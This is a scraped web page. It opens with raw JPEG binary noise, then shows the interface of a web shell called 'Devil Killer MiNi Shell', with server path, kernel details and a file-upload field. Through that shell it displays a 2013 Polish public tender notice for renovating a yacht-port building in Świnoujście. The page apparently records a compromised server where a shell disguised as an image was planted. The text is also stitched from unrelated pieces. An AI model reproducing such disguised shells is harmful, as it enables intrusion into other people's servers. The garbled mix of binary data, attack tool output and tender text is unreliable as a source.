JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131106/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131106/452306-N-2013.html

<p class="kh_header"><b>Świnoujście: Kompleksowe  wykonanie   wielobranżowej  dokumentacji projektowej (w rozbiciu  na dwa etapy inwestycyjne) oraz wykonanie robót budowlanych dla I etapu inwestycji i przeprowadzenie działań promocyjnych dla projektu pn. : ADAPTACJA  ISTNIEJĄCEGO BUDYNKU DO CELÓW OBSŁUGI PORTU JACHTOWEGO POŁOŻONEGO NA TERENIE BASENU PÓŁNOCNEGO W ŚWINOUJŚCIU</b><br>
<b>Numer ogłoszenia: 452306 - 2013; data zamieszczenia: 06.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Sportu i Rekreacji "Wyspiarz" , ul. Jana Matejki 22, 72-600 Świnoujście, woj. zachodniopomorskie, tel. 0-91 3213781, faks 0-91 3213781.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.swinoujscie.pl; www.osir.uznam.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe  wykonanie   wielobranżowej  dokumentacji projektowej (w rozbiciu  na dwa etapy inwestycyjne) oraz wykonanie robót budowlanych dla I etapu inwestycji i przeprowadzenie działań promocyjnych dla projektu pn. : ADAPTACJA  ISTNIEJĄCEGO BUDYNKU DO CELÓW OBSŁUGI PORTU JACHTOWEGO POŁOŻONEGO NA TERENIE BASENU PÓŁNOCNEGO W ŚWINOUJŚCIU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Kompleksowe wykonanie   wielobranżowej  dokumentacji   projektowej   (w  rozbiciu  na  dwa etapy   inwestycyjne) oraz  wykonanie  robót  budowlanych  dla  I etapu   inwestycji  i przeprowadzenie działań promocyjnych dla projektu pn. : ADAPTACJA  ISTNIEJĄCEGO BUDYNKU DO CELÓW OBSŁUGI PORTU JACHTOWEGO, POŁOŻONEGO    NA     TERENIE  BASENU    PÓŁNOCNEGO  W  ŚWINOUJŚCIU
szczegółowy opis zakresu poszczególnych etapów znajduje się w PFU.
Miejsce wykonania:
Świnoujście, Port Jachtowy położony na terenie Basenu Północnego przy nabrzeżu nr 3, działka nr 122/12 obręb 7.

Zamawiający zakłada rozłożenie całości inwestycji na II etapy , które należy zaplanować jako racjonalne i uzasadnione funkcjonalnie podziały . Etapowanie inwestycji należy przeprowadzić  tak,  by oddane  do użytku części mogły być bezkolizyjnie włączane do istniejącej infrastruktury i jednocześnie użytkowanie zgodnie z ich przeznaczeniem.

W ramach przedmiotu zamówienia należy:
1.	wykonać wielobranżową dokumentację projektową z rozbiciem na projekt budowlany i projekt wykonawczy , uwzględniającą inwentaryzacje i ekspertyzy techniczne budynku a także realizację prac budowlanych w dwóch odrębnych etapach inwestycyjnych wraz z uzyskaniem ostatecznej decyzji o pozwoleniu na budowę, 
2.	wykonać roboty budowlane etapu I obejmujące : roboty zabezpieczające , prace konserwatorskie , roboty rozbiórkowe ,roboty stanu surowego zamkniętego , roboty wykończeniowe , roboty  instalacyjne, zagospodarowanie  terenu   wraz doprowadzeniem niezbędnych mediów , 
3.	wyposażyć obiekt (parter) w urządzenia , sprzęt i meble	uzyskać ostateczną decyzję o pozwoleniu na użytkowanie .
4.	przeprowadzić działania promocyjne projektu tj. przygotowanie treści ogłoszenia wraz ze zdjęciami z miejsca realizacji Projektu; uzyskanie formalnej akceptacji przez Zamawiającego treści ogłoszenia i powiązanych z nim zdjęć; przedstawienie propozycji gazet, w których odbyłaby się publikacja ogłoszenia; uzyskanie formalnej akceptacji przez Zamawiającego wydawnictwa, któremu będzie zlecona publikacja ogłoszenia na zakończenie Projektu; dostarczenie Zamawiającemu egzemplarza gazet z ogłoszeniem o realizacji Projektu zaprojektowanie tablicy informacyjnej i pamiątkowej; uzyskanie zgody Wojewódzkiego Konserwatora Zabytków na umieszczenie tablicy pamiątkowej na budynku; wykonanie zaprojektowanych tablic: informacyjnej i pamiątkowej po ich formalnej akceptacji przez Zamawiającego, dostawa tablic do miejsca realizacji Projektu; montaż tablic;
Zakres dokumentacji projektowej  do wykonania:
a. Inwentaryzacja i ekspertyzy techniczne budynku ,
b. Uzyskanie wszystkich wymaganych opinii , pozwoleń , uzgodnień i decyzji ,
c. Projekt budowlany :
       -   projekt zagospodarowania terenu ,
       -   projekt zieleni ,
       -   program prac konserwatorskich ,
       -   projekt   architektoniczno - budowlany   wielobranżowy ,
d.    Informacja dotycząca bezpieczeństwa i ochrony zdrowia ,
e.    Projekt wykonawczy wielobranżowy ,
 f.    Specyfikacje techniczne wykonania i odbioru robót ,
 g.    Przedmiary  robót budowanych ,
 h.    Kosztorys inwestorski  ,
  i.     Instrukcja bezpieczeństwa pożarowego i instrukcja użytkowania obiektu ,
Zakres robót budowlanych etapu I do wykonania:
a.    Roboty   budowlane :
       -  wymiana  istniejących  stropów  wraz  z   izolacjami ,
       -  wymiana   podłóg  na  parterze   wraz  z   izolacjami ,
       -  odkopanie  , wzmocnienie  i  zaizolowanie   fundamentów  wraz  z  drenażem ,
       -  wykonanie   żelbetowej   klatki  schodowej ,
       -  wzmocnienie   i  impregnacja  więźby  dachowej  wraz  z  wymianą  pokrycia , obróbkami 
          i  odwodnieniem ,
       -  montaż   na   dachu   wyłazów ,  okien połaciowych  i  oddymiania    oraz   systemowych elementów  bezpieczeństwa   dachowego ,
       -   przemurowanie   kominów   wraz   z  dodatkowymi   kanałami , 
       -   skucie   tynków   wewnętrznych  ,
       -   systemowa   naprawa  pęknięć  ścian  i nadproży  okiennych ,  
       -   uzupełnienie   i   oczyszczenie  elewacji  z  cegły  klinkierowej ,
       -   wymiana  i  uzupełnienie  zewnętrznej  stolarki  okiennej  i  drzwiowej ,
       -   wykonanie  dodatkowych  drzwi  wejściowych  od  strony  północnej  ,
       -   wykonanie  schodów  zewnętrznych  od  strony  północnej  i  wschodniej ,
       -   wykonanie  podjazdu  dla  osób  niepełnosprawnych  od  strony  wschodniej ,
       -   wykonanie  prac  murarskich  w  tym  ścianek  działowych  na  parterze i piętrze , 
       -   docieplenie  ścian  zewnętrznych  parteru   metodą   od   wewnątrz ,
       -   dobudowanie  pionów   wentylacyjnych ,
       -   montaż  stolarki  drzwiowej  na  parterze ,
       -   wykończenie  wewnętrzne  ścian , podłóg  i sufitów  parteru  okładzinami  i  farbami wraz  z  klatką   schodową ,
       -   balustrady   zewnętrzne   i  wewnętrzne   ze   stali  nierdzewnej ,

b.    Roboty  instalacji  sanitarnych:
-	budowa  przyłączy :  wodnego , kanalizacyjnego  oraz   zewnętrznej   instalacji  gazowej  
wraz   ze   zbiornikiem   na  gaz   płynny , 
-	instalacje  wodne  i  kanalizacyjne   i   w  razie   wymogu   instalacja  hydrantowa ,  instalacja  ppoż.   i   oddymiania ,
-	instalacja centralnego ogrzewania  i  ciepłej  wody użytkowej  zasilane piecem gazowym dwufunkcyjnym oraz instalacja baterii solarnych  wspomagająca przygotowanie  ciepłej  wody  użytkowej ,
-	instalacja  wspomagająca  wentylację grawitacyjną   pom.  sanitarnych  na  parterze
-	dostawa  i  montaż  osprzętu  sanitarnego na  parterze (biały montaż) ,

c.    Roboty  instalacji elektrycznych:
-	budowa   przyłącza  elektroenergetycznego i WLZ ,
-	instalacja  oświetlenia  podstawowego  i   gniazd   wtykowych  na  parterze , 
-	instalacja  kurtyn  powietrznych ,
-	 instalacja   odgromowa  i  uziomowa , 
-	 instalacja okablowania strukturalnego, instalacja telefoniczna, internetowa i TV na parterze  ,
-	system  kontroli  dostępu  i  rozliczania   na  karty  magnetyczne  ,

d.    Zagospodarowanie   terenu:
-	budowa  utwardzonych  dojść  do  budynku ,
-	opaska   drenażowa  budynku ,
-	 trawniki   i   cięcia  pielęgnacyjne  istniejących  drzew ,
-	 elementy małej  architektury (ławki , kosze , stojaki na rowery , osłona drzewa) .  

Szczegółowy opis przedmiotu  zamówienia określa Program Funkcjonalno - Użytkowy (PFU) stanowiący   Załącznik do SIWZ. Inwentaryzacja  budynku , Orzeczenie  techniczne i Wytyczne  wykonania  robót zabezpieczających  będące załącznikami do PFU są jedynie materiałem pomocniczym i nie mogą  stanowić podstawy do wykonania  wielobranżowej dokumentacji  projektowej i ewentualnych roszczeń odszkodowawczych . 
Zaleca się Oferentom przeprowadzenie szczegółowej wizji lokalnej celem uzyskania wszystkich informacji koniecznych do przygotowania oferty i zawarcia umowy. Każdy z Oferentów ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków  realizacji  zamówienia ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających do 50% wartości zamówienia podstawowego  w trybie zamówień z wolnej ręki na zasadach określonych w art. 67 ust.1 pkt.6 PZP. Polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 71.32.00.00-7, 45.22.30.00-6, 45.45.30.00-7, 45.32.00.00-6, 45.40.00.00-1, 45.45.00.00-6, 45.30.00.00-0, 45.31.00.00-3, 45.33.00.00-9, 45.33.10.00-6, 45.23.32.50-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga od wykonawców wniesienia wadium w wysokości 35.000,00 zł (słownie: trzydzieści pięć tysięcy  złotych) przed upływem terminu składania ofert na warunkach określonych w art. 45 i 46 oraz art. 85, ust. 3 i 4 ustawy Prawo zamówień publicznych.
Wadium może być wnoszone w następujących formach: 
w pieniądzu -przelewem na rachunek bankowy Zamawiającego tj:
 21 12 40 39 27 11 11 00 10 51 23 96 27
I.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
II.	gwarancjach bankowych, 
III.	 gwarancjach ubezpieczeniowych,
IV.	poręczeniach udzielanych przez podmioty, o których mowa w Art. 6b ust. 5 pkt 2,    ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju   Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późniejszymi zmianami).

Wadium wnoszone w pieniądzu - przelewem, Wykonawca dołącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu. Na poleceniu przelewu należy wpisać:  Wadium - przetarg:  Kompleksowe wykonanie wielobranżowej  dokumentacji projektowej (w  rozbiciu  na dwa etapy inwestycyjne) oraz wykonanie  robót  budowlanych dla  I etapu inwestycji i przeprowadzenie działań promocyjnych dla projektu pn.: ADAPTACJA ISTNIEJĄCEGO BUDYNKU DO CELÓW OBSŁUGI PORTU JACHTOWEGO POŁOŻONEGO NA TERENIE  BASENU    PÓŁNOCNEGO  W  ŚWINOUJŚCIU 
Datą wniesienia wadium  w pieniądzu przelewem na rachunek jw. jest data uznania wskazanego rachunku.
1.	Dokument potwierdzający zabezpieczenie oferty, wykonawca zobowiązany jest załączyć do oferty.
     Oryginał dokumentu świadczący o wniesieniu wadium w innej formie niż w pieniądzu należy załączyć do oferty 
W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data wpływu środków na rachunek bankowy  Zamawiającego.
                Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa Ustawa PZP.
           Zamawiający zwróci lub zatrzyma wadium zgodnie z art. 46 Ustawy PZP.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia warunków udziału w postępowaniu zamawiający dokona w oparciu o dokumenty stanowiące ofertę metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykażą, że wykonali należycie w okresie pięciu ostatnich lat (a jeśli okres działalności firmy jest krótszy, to w tym okresie) co najmniej jedno zadanie roboty budowlane wraz z wykonaniem dokumentacji projektowej odpowiadające swoim rodzajem i wartościom robót budowlanych stanowiącym przedmiot zamówienia. 
Przez zadanie odpowiadające wymaganemu rodzajowi i wartości Zamawiający rozumie co najmniej jedno zadanie polegające na wykonaniu robót budowlanych wraz z dokumentacją projektową związanych z adaptacją istniejącego budynku o kubaturze nie mniejszej niż 1 500 m3 o wartości minimum 1.600.000,00 zł brutto i wpisanym do rejestru zabytków o której mowa w art. 7 ustawy z dnia 23 lipca 2003 roku o ochronie zabytków i opiece nad zabytkami (Dz. U. 2003 nr 162 poz. 1568 z późn. zm.) realizacja których potwierdzona została dokumentami wystawionymi przez zamawiających Realizacja każdej z robót budowlanych powinna być potwierdzona załączonymi dowodami, potwierdzającymi, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Wartości podane w dokumentach potwierdzających spełnienie warunku w walutach innych niż wskazane przez Zamawiającego Wykonawca przeliczy wg średniego kursu NBP na dzień wystawienia  Protokołu odbioru robót lub równoważnego dokumentu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia warunków udziału w postępowaniu zamawiający dokona w oparciu o dokumenty stanowiące ofertę metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>którzy wykażą, że dysponują osobami odpowiedzialnymi za kierowanie robotami budowlanymi: 
Kierownik Budowy - posiadający wykształcenie wyższe techniczne, uprawnienia budowlane określone przepisami ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity Dz. U. z 2010r. Nr 243, poz. 1623 z późn. zm.) upoważniające do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej posiadającym także kwalifikacje uprawniające do kierowania robotami budowlanymi przy zabytkach nieruchomych zgodnie z §24 rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. z 2011r. Nr 165, poz. 987);

Kierownik robót sanitarnych posiadający wykształcenie wyższe techniczne, uprawnienia budowlane określone przepisami ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity Dz. U. z 2010r. Nr 243, poz. 1623 z późn. zm.) upoważniające do kierowania robotami budowlanymi (bez ograniczeń) w specjalności instalacje   sanitarne ,

Kierownik robót elektrycznych posiadający wykształcenie wyższe techniczne, uprawnienia budowlane określone przepisami ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity Dz. U. z 2010r. Nr 243, poz. 1623 z późn. zm.) upoważniające do kierowania robotami budowlanymi (bez ograniczeń) w specjalności instalacje elektryczne ,

Projektant  prowadzący  posiadający wykształcenie wyższe techniczne, uprawnienia budowlane bez ograniczeń do projektowania w specjalności   konstrukcyjno - budowlanej  oraz  doświadczenie  przy   wykonaniu  co najmniej jednej usługi opracowania dokumentacji projektowej remontu, adaptacji, przebudowy budynków wpisanego do rejestru zabytków, o którym mowa w Ustawie z dnia 23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami o wartości co najmniej 1 .600.000,00 PLN brutto.
Projektant posiadający uprawnienia budowlane bez ograniczeń do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych elektroenergetycznych; 
Projektant posiadający uprawnienia budowlane bez ograniczeń do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych.
UWAGA!
Wykonawca może uwzględnić zatrudnienie dodatkowych osób, których nie uwzględniono w SIWZ  a dysponowanie którymi umożliwi prawidłową realizację przedmiotu zamówienia ich wynagrodzenie należy uwzględnić w wynagrodzeniu personelu podstawowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia warunków udziału w postępowaniu zamawiający dokona w oparciu o dokumenty stanowiące ofertę metodą spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W przypadku podmiotów występujących wspólnie w postępowaniu - pełnomocnictwo do reprezentowania podmiotów występujących wspólnie lub do występowania wspólnie i zawarcia umowy.
